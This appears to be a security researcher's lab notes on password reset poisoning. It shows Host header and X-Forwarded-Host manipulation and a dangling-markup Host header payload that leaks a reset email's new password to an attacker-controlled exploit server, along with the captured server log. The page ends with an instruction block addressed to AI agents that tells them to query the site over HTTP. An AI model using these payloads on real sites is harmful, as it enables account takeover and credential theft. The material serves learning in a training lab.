# Password reset poisoning

Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into generating a password reset link pointing to a domain under their control.

## Changing the host header to point the malicious domain

Issue a request by using your own user, intercept the Password Reset process and replace the Host header to point to your domain. 

<figure><img src="/files/Zde4PeKe6rH35pzzFcvR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/p4Ih2YZVjWj9qQZk1PXS" alt=""><figcaption></figcaption></figure>

## Password reset poisoning via middleware

To perform this attack instead of just replace the host header add:

```
X-Forwarded-Host: exploit-0a4200f20354f7f78397d1b401e20049.exploit-server.net
```

<figure><img src="/files/R2zG5BmFq0tjOdFhcOzB" alt=""><figcaption></figcaption></figure>

This will poison the request to point to your server and then when the user click on it you will obtain the token to change the password in the logs.

<figure><img src="/files/ZqlEwTDpFI6czUNm5ZaI" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/2Ppv6FThGk1ZCUfykOW4" alt=""><figcaption></figcaption></figure>

## Password reset poisoning via dangling markup

If the application doesn’t use reset tokens and instead sends the **new password directly in the email body**, you can exploit this by injecting HTML in the `Host` header to **break the markup** and leak the full content to your **malicious server** via a `GET` request.

```
Sent:     2025-03-28 03:46:12 +0000  
From:     no-reply@<lab-id>.web-security-academy.net  
To:       wiener@exploit-<exploit-id>.exploit-server.net  
Subject:  Account recovery
<p>Hello!</p>
<p>Please <a href='https://<lab-id>.web-security-academy.net/login'>click here</a> to login with your new password: uW9zyg2qaG</p>
<p>Thanks,<br/>Support team</p>
<i>This email has been scanned by the MacCarthy Email Security service</i>
```

**Exploit Payload**

You send a request to `/forgot-password` with a **malicious `Host` header**:

```
Host: <lab-id>.web-security-academy.net:'<a href="//<your-exploit-server>.exploit-server.net/?
```

This **breaks the original link**, and turns the **rest of the email body** into part of the `<a href>`. The browser (or client) will automatically follow the link and **send a GET request** to your server.

<figure><img src="/files/vEWqzQzmrVzqsQNOav0O" alt=""><figcaption></figcaption></figure>

Raw:

```java
Sent:     2025-03-28 03:42:11 +0000
From:     no-reply@0ac3008a0318e2e88088260e000500ac.web-security-academy.net
To:       wiener@exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net
Subject:  Account recovery

<p>Hello!</p><p>Please <a href='https://0ac3008a0318e2e88088260e000500ac.web-security-academy.net:'<a href="//exploit-0ae4006c03aee2ae804725d201880032.exploit-server.net/?/login'>click here</a> to login with your new password: UalLCIt2ub</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>
```

Your server wil catch the request:

```http
10.0.3.226  2025-03-28 03:42:46 +0000  
"GET /?/login'>click+here</a>+to+login+with+your+new+password:+5B9ufwHEy7</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://intrusionz3r0.gitbook.io/intrusionz3r0/hacking-web/vulnerabilities/password-reset-poisoning.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.